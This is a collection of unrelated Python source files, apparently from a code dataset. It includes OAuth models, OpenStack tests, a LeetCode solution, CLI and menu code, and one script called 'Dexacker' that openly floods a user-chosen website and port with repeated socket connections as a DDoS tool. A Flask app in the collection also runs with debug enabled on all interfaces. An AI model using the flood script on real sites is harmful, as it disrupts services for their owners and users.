command=0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
stream = tornado.iostream.IOStream(s)
stream.connect(("localhost", 9002), send_request)
#stream.connect(("221.180.20.232", 9002), send_request)
tornado.ioloop.IOLoop.instance().start() |
#! /usr/bin/env python
import sys, os
sys.path.append('./include/python')
import proteomatic
import string
import re
class TransposeDna(proteomatic.ProteomaticScript):
def run(self):
# convert all characters to upper case
# Attention: parameters are Unicode because of the JSON p | arser
# used behind the scenes, convert nucleotides to ASCII string
dna = str(self.param['nucleotides']).upper()
# remove invalid characters
dna = re.sub('[^ACGT]', '', dna)
# reverse sequence
dna = dna[::-1]
# replace nucleotides
dna = dna.translate(string.maketrans('ACGT', 'TGCA'))
# output transposed DNA
print(dna)
if 'result' in self.output:
with open(self.output['result'], 'w | ') as f:
f.write(dna + "\n")
if __name__ == '__main__':
script = TransposeDna()
|
#-*- coding: utf-8 -*-
"""OAuth 2.0 Django Models"""
import time
from hashlib import sha512
from uuid import uuid4
from django.db import models
from django.contrib.auth.models import User
from .consts import CLIENT_KEY_LENGTH, CLIENT_SECRET_LENGTH
from .consts import SCOPE_LENGTH
from .consts import ACCESS_TOKEN_LENGTH, REFRESH_TOKEN_LENGTH
from .consts import ACCESS_TOKEN_EXPIRATION, MAC_KEY_LENGTH, REFRESHABLE
from .consts import CODE_KEY_LENGTH, CODE_EXPIRATION
from djangotoolbox.fields import ListField
class TimestampGenerator(object):
"""Callable Timestamp Generator that returns a UNIX time integer.
**Kwargs:**
* *seconds:* A integer indicating how many seconds in the future the
timestamp should be. *Default 0*
*Returns int*
"""
def __init__(self, seconds=0):
self.seconds = seconds
def __call__(self):
return int(time.time()) + self.seconds
class KeyGenerator(object):
"""Callable Key Generator that returns a random keystring.
**Args:**
* *length:* A integer indicating how long the key should be.
*Returns str*
"""
def __init__(self, length):
self.length = length
def __call__(self):
return sha512(uuid4().hex).hexdigest()[0:self.length]
class Client(models.Model):
"""Stores client authentication data.
**Args:**
* *name:* A string representing the client name.
* *user:* A django.contrib.auth.models.User object representing the client
owner.
**Kwargs:**
* *description:* A string representing the client description.
*Default None*
* *key:* A string representing the client key. *Default 30 character
random string*
* *secret:* A string representing the client secret. *Defaul | t 30 character
random string*
* *redirect_uri:* A string representing the client redirect_uri.
*Default None*
"""
name = models.CharField(max_length=256)
user = models.ForeignKey(User)
description = models.TextField(null=True, blank=True)
key = models.CharField(
unique=Tr | ue,
max_length=CLIENT_KEY_LENGTH,
default=KeyGenerator(CLIENT_KEY_LENGTH),
db_index=True)
secret = models.CharField(
unique=True,
max_length=CLIENT_SECRET_LENGTH,
default=KeyGenerator(CLIENT_SECRET_LENGTH))
redirect_uri = models.URLField(null=True)
class AccessRange(models.Model):
"""Stores access range data, also known as scope.
**Args:**
* *key:* A string representing the access range scope. Used in access
token requests.
**Kwargs:**
* *description:* A string representing the access range description.
*Default None*
"""
key = models.CharField(unique=True, max_length=SCOPE_LENGTH, db_index=True)
description = models.TextField(blank=True)
class AccessToken(models.Model):
"""Stores access token data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *token:* A string representing the access key token. *Default 10
character random string*
* *refresh_token:* A string representing the access key token. *Default 10
character random string*
* *mac_key:* A string representing the MAC key. *Default None*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
* *refreshable:* A boolean that indicates whether this access token is
refreshable. *Default False*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
token = models.CharField(
unique=True,
max_length=ACCESS_TOKEN_LENGTH,
default=KeyGenerator(ACCESS_TOKEN_LENGTH),
db_index=True)
refresh_token = models.CharField(
unique=True,
blank=True,
null=True,
max_length=REFRESH_TOKEN_LENGTH,
default=KeyGenerator(REFRESH_TOKEN_LENGTH),
db_index=True)
mac_key = models.CharField(
blank=True,
null=True,
max_length=MAC_KEY_LENGTH,
default=None)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(ACCESS_TOKEN_EXPIRATION))
scope = ListField()
refreshable = models.BooleanField(default=REFRESHABLE)
class Code(models.Model):
"""Stores authorization code data.
**Args:**
* *client:* A oauth2app.models.Client object
* *user:* A django.contrib.auth.models.User object
**Kwargs:**
* *key:* A string representing the authorization code. *Default 30
character random string*
* *expire:* A positive integer timestamp representing the access token's
expiration time.
* *redirect_uri:* A string representing the redirect_uri provided by the
requesting client when the code was issued. *Default None*
* *scope:* A list of oauth2app.models.AccessRange objects. *Default None*
"""
client = models.ForeignKey(Client)
user = models.ForeignKey(User)
key = models.CharField(
unique=True,
max_length=CODE_KEY_LENGTH,
default=KeyGenerator(CODE_KEY_LENGTH),
db_index=True)
issue = models.PositiveIntegerField(
editable=False,
default=TimestampGenerator())
expire = models.PositiveIntegerField(
default=TimestampGenerator(CODE_EXPIRATION))
redirect_uri = models.URLField(null=True)
scope = ListField()
class MACNonce(models.Model):
"""Stores Nonce strings for use with MAC Authentication.
**Args:**
* *access_token:* A oauth2app.models.AccessToken object
* *nonce:* A unique nonce string.
"""
access_token = models.ForeignKey(AccessToken)
nonce = models.CharField(max_length=30, db_index=True)
|
#!/usr/bin/env python
#______________________________________#
#Dexacker is an open source tool developed by Abdelmadjd Cherfaoui
#Dexacker is designed for Educational Stuff to do a LEGAL DDOS Test and the developers is
# not responsible for ILLEGAL USES
#Contacting using:@Hexacker | fb.com/Hexacker
#http://www.hackercademy.com
#http://www.bringitsimple.com
#______________________________________#
#Importing Modules
import socket,os,sys,string
#Lunching Tool
print "Lunching Dexacker..."
print "Remember that Dexacker is an Educational Tool\nand you are responsible for any ILLEGAL USES\nThe Developer is not responsible for your behaviors "
#Default Settings
host = raw_input("Enter t | he website link you want to DDOS it: ")
port = int(raw_input("Enter the port you want to Attack: "))
message = raw_input("Write the message you want to send it: ")
connections = int(raw_input("How many beat you want to make: " ))
IP = socket.gethostbyname(host)
#/
#The Attacking Function
def Attack():
attack = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
attack.connect((host,80))
attack.send(message)
attack.sendto(message, (IP,port))
attack.send(message);
excep | t socket.error,msg:
print "Connection Failed"
print "DDOS Attack Lunched"
attack.close()
for i in range(1,connections):
Attack()
print "______________________________________"
print "The Operation is finished"
#this is the restaring function
def Restart():
program = sys.executable
os.execl(program,program,* sys.argv)
CurDirectory = os.getcwd()
if __name__ == "__main__":
request = raw_input("Do you start over? Y or N :")
if request.strip() in "y Y yes Yes YES YEs yES".split():
Restart()
else:
os.system(CurDirectory+"Dexacker.py")
|
"""Describe group states."""
from ho | meassistant.components.group import GroupIntegrationRegistry
from homeassistant.const import STATE_OK, STATE_PROBLEM
from homeassistant.core import HomeAssistant, callback
@callback
def async_describe_on_off_states(
hass: HomeAssistant, registry: GroupIntegrationRegistry
) -> None: |
"""Describe group on off states."""
registry.on_off_states({STATE_PROBLEM}, STATE_OK)
|
AndReturn([self.servers.list(), False])
cinder.volume_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None).\
AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest)).MultipleTimes().\
AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
url = VOLUME_INDEX_URL
res = self.client.post(url, formData, follow=True)
self.assertEqual(list(res.context['messages'])[0].message,
u'Unable to delete volume "%s". '
u'One or more snapshots depend on it.' %
volume.name)
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments(self):
PREV = settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point']
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = True
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
volume.attachments = [{'id': volume.id,
'volume_id': volume.id,
'volume_name': volume.name,
'instance': servers[0],
'device': '/dev/vdb',
'server_id': servers[0].id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
msg = 'Volume %s on instance %s' % (volume.name, servers[0].name)
self.assertContains(res, msg)
# Asserting length of 2 accounts for the one instance option,
# and the one 'Choose Instance' option.
form = res.context['form']
self.assertEqual(len(form.fields['instance']._choices),
1)
self.assertEqual(res.status_code, 200)
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.TextInput))
settings.OPENSTACK_HYPERVISOR_FEATURES['can_set_mount_point'] = PREV
@test.create_stubs({cinder: ('volume_get',), api.nova: ('server_list',)})
def test_edit_attachments_cannot_set_mount_point(self):
volume = self.cinder_volumes.first()
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)).AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
# Assert the device field is hidden.
form = res.context['form']
self.assertTrue(isinstance(form.fields['device'].widget,
widgets.HiddenInput))
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_list',)})
def test_edit_attachments_attached_volume(self):
servers = [s for s in self.servers.list()
if s.tenant_id == self.request.user.tenant_id]
server = servers[0]
volume = self.cinder_volumes.list()[0]
cinder.volume_get(IsA(http.HttpRequest), volume.id) \
.AndReturn(volume)
api.nova.server_list(IsA(http.HttpRequest)) \
.AndReturn([servers, False])
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:attach',
args=[volume.id])
res = self.client.get(url)
self.assertEqual(res.context['form'].fields['instance']._choices[0][1],
"Select an instance")
self.assertEqual(len(res.context['form'].fields[' | instance'].choice | s),
2)
self.assertEqual(res.context['form'].fields['instance']._choices[1][0],
server.id)
self.assertEqual(res.status_code, 200)
@test.create_stubs({cinder: ('tenant_absolute_limits',
'volume_list',
'volume_backup_supported',),
api.nova: ('server_list',)})
def test_create_button_disabled_when_quota_exceeded(self):
limits = self.cinder_limits['absolute']
limits['totalVolumesUsed'] = limits['maxTotalVolumes']
volumes = self.cinder_volumes.list()
api.cinder.volume_backup_supported(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(True)
cinder.volume_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn(volumes)
api.nova.server_list(IsA(http.HttpRequest), search_opts=None)\
.AndReturn([self.servers.list(), False])
cinder.tenant_absolute_limits(IsA(http.HttpRequest))\
.MultipleTimes().AndReturn(limits)
self.mox.ReplayAll()
res = self.client.get(VOLUME_INDEX_URL)
self.assertTemplateUsed(res, 'project/volumes/index.html')
volumes = res.context['volumes_table'].data
self.assertItemsEqual(volumes, self.cinder_volumes.list())
create_link = tables.CreateVolume()
url = create_link.get_link_url()
classes = list(create_link.get_default_classes())\
+ list(create_link.classes)
link_name = "%s (%s)" % (unicode(create_link.verbose_name),
"Quota exceeded")
expected_string = "<a href='%s' title='%s' class='%s disabled' "\
"id='volumes__action_create' data-update-url=" \
"'/project/volumes/?action=create&table=volumes'> "\
"<span class='glyphicon glyphicon-plus'></span>%s</a>" \
% (url, link_name, " ".join(classes), link_name)
self.assertContains(res, expected_string, html=True,
msg_prefix="The create button is not disabled")
@test.create_stubs({cinder: ('volume_get',),
api.nova: ('server_get',)})
def test_detail_view(self):
volume = self.cinder_volumes.first()
server = self.servers.first()
volume.attachments = [{"server_id": server.id}]
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
api.nova.server_get(IsA(http.HttpRequest), server.id).AndReturn(server)
self.mox.ReplayAll()
url = reverse('horizon:project:volumes:volumes:detail',
args=[volume.id])
res = self.client.get(url)
self.assertContains(res, "<h2>Volume Details: Volume name</h2>",
1, 200)
self.assertContains(res, "<dd>Volume name</dd>", 1, 200)
self.assertContains(res, "<dd>%s</dd>" % volume.id, 1, 200)
self.assertContains(res, "<dd>Available</dd>", 1, 200)
self.assertContains(res, "<dd>40 GB</dd>", 1, 200)
self.assertContains(res,
("<a href=\"/project/instances/1/\">%s</a>"
% server.name),
1,
200)
self.assertNoMessages()
@test.create_stubs({cinder: ('volume_get',)})
def test_get_data(self):
volume = self.cinder_volumes.get(name='v2_volume')
volume._apiresource.name = ""
cinder.volume_get(IsA(http.HttpRequest), volume.id).AndReturn(volume)
self.mox.ReplayAll()
url = VOLUME_INDEX_URL + \
"?action=row_update&table=volumes&obj_id=" + volume.id
res = self.client.get(url, {},
HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(res.status_code, 200)
|
#!/usr | /bin/env python
# encoding: utf-8
"""
__init__.py
The MIT License (MIT)
Copyright (c) 2013 Matt Ryan
| Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import os
import stomp
import json
import afutils.file_pattern as pattern
from aflib3 import AFLibraryEntry
class AFMQ:
'''Represents a basic connection to an ActiveMQ
service for AudioFile.
'''
def __init__(self, queue_name):
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.disconnect()
def put(self, msg):
self.queue_handle.send(msg, destination=self.queue_name)
class BasicHandler:
'''Represents an ActiveMQ handler that consumes information
from the queue.
'''
def __init__(self, aflib, queue_name):
self.aflib = aflib
self.queue_name = queue_name
self.queue_handle = stomp.Connection()
self.queue_handle.set_listener(queue_name, self)
self.queue_handle.start()
self.queue_handle.connect()
self.queue_handle.subscribe(destination=queue_name, ack='auto')
def __del__(self):
self.queue_handle.stop()
def on_error(self, headers, message):
print '%s: Received an error: "%s"' % (self.__class__, message)
def on_message(self, headers, message):
print '%s: Received message: "%s"' % (self.__class__, message)
class AddFileHandler(BasicHandler):
'''Adds files to the AudioFile library as the files
are posted into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/library_additions')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
self.aflib.add_mp3(args[0], args[1])
class RenameFileHandler(BasicHandler):
'''Renames files from the old path to the new specified
path as the information is put into a queue.
'''
def __init__(self, aflib):
BasicHandler.__init__(self, aflib, '/audiofile/file_renames')
def on_message(self, headers, message):
BasicHandler.on_message(self, headers, message)
args = json.loads(message)
song = AFLibraryEntry()
song.apply_dict(args[0])
newpath = pattern.get_new_path(song, args[1])
print 'Renaming "%s" as "%s"...' % (song.path, newpath)
os.rename(song.path, newpath)
if __name__ == '__main__':
pass
|
import logging
from django.core.management.base import BaseCommand
| from citation.ping_urls import verify_url_status
logger = logging.getLogger(__ | name__)
class Command(BaseCommand):
help = '''Method that check if the code archived urls are active and working or not '''
def handle(self, *args, **options):
verify_url_status()
logger.debug("Validation completed")
|
from flask import Blueprint, flash, redirect, render_template, request, url_for
from sqlalchemy.orm.exc import NoResultFound
from ..sqltypes import HashableLocale as Locale
from ..work import Trope, Work
from .db import session
adv_search_bp = Blueprint('adv_searc | h', __name__)
@adv_search_bp.route('/', methods=['POST'])
def result():
about = request.form.getlist('about[]', None)
category = request.form.getlist('category[]', None)
| detail = request.form.getlist('detail[]', None)
error_redirect = redirect(url_for('index'))
if about is None or category is None or detail is None:
flash('Invalid arguments.', 'danger')
return error_redirect
if type(about) != list or type(category) != list or type(detail) != list:
flash('Invalid arguments..', 'danger')
return error_redirect
if len(about) != len(category) or len(about) != len(detail):
flash('Invalid arguments...', 'danger')
return error_redirect
query = zip(about, category, detail)
media_list = []
trope_filter = None
for about, category, detail in query:
if about == 'info':
if category == 'media':
media_list.append(detail)
elif about == 'trope':
try:
trope = session.query(Trope).get(detail)
except NoResultFound:
return error_redirect
if trope_filter is None:
trope_filter = Work.tropes.any(Trope.id == trope.id)
else:
trope_filter = trope_filter & \
Work.tropes.any(Trope.id == trope.id)
if not media_list and trope_filter is None:
flash('Invalid arguments....', 'danger')
return error_redirect
result = session.query(
Work,
Work.canonical_name(Locale.parse('en_US')).label('canonical_name')
)
if media_list:
result = result.filter(Work.media_type.in_(media_list))
if trope_filter is not None:
result = result.filter(trope_filter)
return render_template('adv_search/result.html', result=result)
|
#!/usr/bin/env python
from flask import (Flask, request, render_template)
from flask.ext import restful
from flask.ext.restful import reqparse
import pickle
SETTINGS_P = 'settings.p'
app = Flask(__name__)
api = restful.Api(app)
def get_settings():
settings = {'state':'off'}
try:
settings = pickle.load(open(SETTINGS_P, 'rb'))
except IOError:
pass
return settings
def set_state(state):
settings = get_settings()
settings['state'] = state
pickle.dump( settings, open(SETTINGS_P, 'wb'))
# Restful Resource for setting the light state
@api.resource('/api/state')
class SetState(restful.Resource):
def get(self):
settings = get_sett | ings()
parser = reqparse.RequestParser()
parser.add_argument('value', type=str, location='args',
choices=['on','off'])
args = parser.parse_args()
value = args['value']
if value:
set_state(value)
settings = get_se | ttings()
print "Setting state to {}".format(value)
return {'state':settings['state']}
# View to present a form to change the light state
@app.route('/', methods=['GET','POST'])
def index():
if request.method == 'POST':
set_state(request.form['state'])
settings = get_settings()
state = settings['state']
return render_template('index.html', state=state)
if __name__ == '__main__':
app.run(host='0.0.0.0', debug=True)
|
__source__ = 'https://leetcode.com/problems/nested-list-weight-sum/'
# https://github.com/kamyu104/LeetCode/blob/master/Python/nested-list-weight-sum.py
# Time: O(n)
# Space: O(h)
#
# Description: Leetcode # 339. Nested List Weight Sum
#
# Given a nested list of integers, return the sum of all integers in the list weighted by their depth.
#
# Each element is either an integer, or a list -- whose elements m | ay also be integers or other lists.
#
# Example 1:
# Given the list [[1 | ,1],2,[1,1]], return 10. (four 1's at depth 2, one 2 at depth 1)
#
# Example 2:
# Given the list [1,[4,[6]]], return 27. (one 1 at depth 1, one 4 at depth 2, and one 6 at depth 3; 1 + 4*2 + 6*3 = 27)
#
# Companies
# LinkedIn
# Related Topics
# Depth-first Search
# Similar Questions
# Nested List Weight Sum II Array Nesting
#
# """
# This is the interface that allows for creating nested lists.
# You should not implement it, or speculate about its implementation
# """
import unittest
# 20ms 100%
class NestedInteger(object):
def isInteger(self):
"""
@return True if this NestedInteger holds a single integer, rather than a nested list.
:rtype bool
"""
def getInteger(self):
"""
@return the single integer that this NestedInteger holds, if it holds a single integer
Return None if this NestedInteger holds a nested list
:rtype int
"""
def getList(self):
"""
@return the nested list that this NestedInteger holds, if it holds a nested list
Return None if this NestedInteger holds a single integer
:rtype List[NestedInteger]
"""
class Solution(object):
def depthSum(self, nestedList):
"""
:type nestedList: List[NestedInteger]
:rtype: int
"""
def depthSumHelper(nestedList, depth):
res = 0
for l in nestedList:
if l.isInteger():
res += l.getInteger() * depth
else:
res += depthSumHelper(l.getList(), depth + 1)
return res
return depthSumHelper(nestedList, 1)
class TestMethods(unittest.TestCase):
def test_Local(self):
self.assertEqual(1, 1)
if __name__ == '__main__':
unittest.main()
Java = '''
Thought: https://leetcode.com/problems/nested-list-weight-sum/solution/
/**
* // This is the interface that allows for creating nested lists.
* // You should not implement it, or speculate about its implementation
* public interface NestedInteger {
*
* // @return true if this NestedInteger holds a single integer, rather than a nested list.
* public boolean isInteger();
*
* // @return the single integer that this NestedInteger holds, if it holds a single integer
* // Return null if this NestedInteger holds a nested list
* public Integer getInteger();
*
* // @return the nested list that this NestedInteger holds, if it holds a nested list
* // Return null if this NestedInteger holds a single integer
* public List<NestedInteger> getList();
* }
*/
1. DFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
return dfs(nestedList, 1);
}
public int dfs(List<NestedInteger> nestedList, int depth) {
int sum = 0;
for (NestedInteger e : nestedList) {
sum += e.isInteger() ? e.getInteger() * depth : dfs(e.getList(), depth + 1);
}
return sum;
}
}
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
for (NestedInteger ni : nestedList) {
sum += depthSum(ni, 1);
}
return sum;
}
private int depthSum(NestedInteger ni, int depth) {
if (ni.isInteger()) {
return ni.getInteger() * depth;
} else {
int sum = 0;
for (NestedInteger n : ni.getList()) {
sum += depthSum(n, depth + 1);
}
return sum;
}
}
}
2. BFS
# 2ms 97%
class Solution {
public int depthSum(List<NestedInteger> nestedList) {
int sum = 0;
Queue<NestedInteger> queue = new LinkedList<>();
int depth = 1;
for (NestedInteger ni : nestedList) {
queue.add(ni);
}
while (!queue.isEmpty()) {
int size = queue.size();
while (size-- > 0) {
NestedInteger cur = queue.poll();
if (cur.isInteger()) {
sum += cur.getInteger() * depth;
} else {
for (NestedInteger ni : cur.getList()) {
queue.add(ni);
}
}
}
depth++;
}
return sum;
}
}
'''
|
"""Edit the RWhois data on the account."""
# :license: MIT, see LICENSE for more details.
import SoftLayer
from SoftLayer.CLI import environment
from SoftLayer.CLI import exceptions
import click
@click.command()
@click.option('--abuse', help='Set the abuse email address')
@click.option('--address1', help='Update the address 1 field')
@click.option('--address2', help='Update the address 2 field')
@click.option('--city', help='Set the city name')
@click.option('--company', help='Set the company name')
@click.option('--country', help='Set the two-letter country code')
@click. | option('--firstname', help='Update the first name field')
@click.option('--lastname', help='Update the last name field')
@click.option('--postal', | help='Set the postal code field')
@click.option('--public/--private',
default=None,
help='Flags the address as a public or private residence.')
@click.option('--state', help='Set the two-letter state code')
@environment.pass_env
def cli(env, abuse, address1, address2, city, company, country, firstname,
lastname, postal, public, state):
"""Edit the RWhois data on the account."""
mgr = SoftLayer.NetworkManager(env.client)
update = {
'abuse_email': abuse,
'address1': address1,
'address2': address2,
'company_name': company,
'city': city,
'country': country,
'first_name': firstname,
'last_name': lastname,
'postal_code': postal,
'state': state,
'private_residence': public,
}
if public is True:
update['private_residence'] = False
elif public is False:
update['private_residence'] = True
check = [x for x in update.values() if x is not None]
if not check:
raise exceptions.CLIAbort(
"You must specify at least one field to update.")
mgr.edit_rwhois(**update)
|
# -*- coding: utf-8 -*-
#
# RERO IL | S
# Copyright (C) 2019 RERO
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affer | o General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""Libraries elasticsearch mapping tests."""
from utils import get_mapping
from rero_ils.modules.locations.api import Location, LocationsSearch
def test_location_es_mapping(es, db, loc_public_martigny_data,
lib_martigny, org_martigny):
"""Test library elasticsearch mapping."""
search = LocationsSearch()
mapping = get_mapping(search.Meta.index)
assert mapping
loc = Location.create(
loc_public_martigny_data, dbcommit=True, reindex=True, delete_pid=True)
new_mapping = get_mapping(search.Meta.index)
assert mapping == new_mapping
loc.delete(force=True, dbcommit=True, delindex=True)
def test_location_search_mapping(app, locations_records):
"""Test library search mapping."""
search = LocationsSearch()
c = search.query('match', code='MARTIGNY-PUBLIC').count()
assert c == 1
c = search.query('match', code='SAXON-PUBLIC').count()
assert c == 1
|
s')
namecopy = _('_Copy VoIP address')
elif url[1] in terminal.matches.values():
# This is a plugin match
for pluginname in terminal.matches:
if terminal.matches[pluginname] == url[1]:
break
dbg("Found match ID (%d) in terminal.matches plugin %s" %
(url[1], pluginname))
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('url_handler')
for urlplugin in plugins:
if urlplugin.handler_name == pluginname:
dbg("Identified matching plugin: %s" %
urlplugin.handler_name)
nameopen = _(urlplugin.nameopen)
namecopy = _(urlplugin.namecopy)
break
if not nameopen:
nameopen = _('_Open link')
if not namecopy:
namecopy = _('_Copy address')
icon = Gtk.Image.new_from_stock(Gtk.STOCK_JUMP_TO,
Gtk.IconSize.MENU)
item = Gtk.ImageMenuItem.new_with_mnemonic(nameopen)
item.set_property('image', icon)
item.connect('activate', lambda x: terminal.open_url(url, True))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(namecopy)
item.connect('activate',
lambda x: terminal.clipboard.set_text(terminal.prepare_url(url), len(terminal.prepare_url(url))))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Copy'))
item.connect('activate', lambda x: terminal.vte.copy_clipboard())
item.set_sensitive(terminal.vte.get_has_selection())
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Paste'))
item.connect('activate', lambda x: terminal.paste_clipboard())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split H_orizontally'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_horiz', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-horiz',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.ImageMenuItem.new_with_mnemonic(_('Split V_ertically'))
image = Gtk.Image()
image.set_from_icon_name(APP_NAME + '_vert', Gtk.IconSize.MENU)
item.set_image(image)
if hasattr(item, 'set_always_show_image'):
item.set_always_show_image(True)
item.connect('activate', lambda x: terminal.emit('split-vert',
self.terminal.get_cwd()))
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Tab'))
item.connect('activate', lambda x: terminal.emit('tab-new', False,
terminal))
menu.append(item)
if self.terminator.debug_address is not None:
item = Gtk.MenuItem.new_with_mnemonic(_('Open _Debug Tab'))
item.connect('activate', lambda x:
terminal.emit('tab-new', True, terminal))
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.ImageMenuItem.new_with_mnemonic(_('_Close'))
item.connect('activate', lambda x: terminal.close())
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if not terminal.is_zoomed():
sensitive = not terminal.get_toplevel() == terminal.get_parent()
item = Gtk.MenuItem.new_with_mnemonic(_('_Zoom terminal'))
item.connect('activate', terminal.zoom)
item.set_sensitive(sensitive)
menu.append(item)
item = Gtk.MenuItem.new_with_mnemonic(_('Ma_ximize terminal'))
item.connect('activate', terminal.maximise)
item.set_sensitive(sensitive)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
else:
item = Gtk.MenuItem.new_with_mnemonic(_('_Restore all terminals'))
item.connect('activate', terminal.unzoom)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
if self.config['show_titlebar'] == False:
item = Gtk.MenuItem.new_with_mnemonic(_('Grouping'))
submenu = self.terminal.populate_group_menu()
submenu.show_all()
item.set_submenu(submenu)
menu.append(item)
menu.append(Gtk.SeparatorMenuItem())
item = Gtk.CheckMenuItem.new_with_mnemonic(_('Show _scrollbar'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', lambda x: terminal.do_scrollbar_toggle())
menu.append(item)
item = gtk.CheckMenuItem(_('Toggle tab visibility'))
item.set_active(terminal.scrollbar.get_property('visible'))
item.connect('toggled', self.toggle_tab_visibility)
menu.append(item)
if hasattr(Gtk, 'Builder'): # VERIFY FOR GTK3: is this ever false?
item = Gtk.MenuItem.new_with_mnemonic(_('_Preferences'))
item.connect('activate', lambda x: PrefsEditor(self.terminal))
menu.append(item)
profilelist = sorted(self.config.list_profiles(), key=string.lower)
if len(profilelist) > 1:
item = Gtk.MenuItem.new_with_mnemonic(_('Profiles'))
submenu = Gtk.Menu()
item.set_submenu(submenu)
menu.append(item)
current = terminal.get_profile()
group = None
for profile in profilelist:
profile_label = profile
if profile_label == 'default':
profile_label = profile.capitalize()
item = Gtk.RadioMenuItem(profile_label, group)
if profile == current:
item.set_active(True)
item.connect('activate', terminal.force_set_profile, profile)
submenu.append(item)
self.add_encoding_items(menu)
try:
menuitems = []
registry = plugin.PluginRegistry()
registry.load_plugins()
plugins = registry.get_plugins_by_capability('terminal_menu')
for menuplugin in plugins:
menuplugin.callback(menuitems, menu, terminal)
if len(menuitems) > 0:
menu.append(Gtk.SeparatorMenuItem())
for menuitem in menuitems:
menu.append(menuitem)
except Exception, ex:
err('TerminalPopupMenu::show: %s' % ex)
menu.show_all()
menu.popup(None, None, None, None, button, time)
return(True)
def toggle_tab_visibility(self, widget):
"""tab visibility"""
status = self.config['tab_position']
old_tab_position = self.config['old_tab_position']
if status == 'hidden':
if old_tab_position:
#if there's no oldstatus, hidden is default option
self.config['tab_position'] = old_tab_position
self.config.save()
else:
self.config['old_tab_position'] = status
self.config['tab_position' | ] = 'hidden'
self.config.save()
terminator = Terminator()
terminator.reconfigure()
def add_encoding_items(self, menu):
"""Add the encoding list to the menu"""
terminal = self.t | erminal
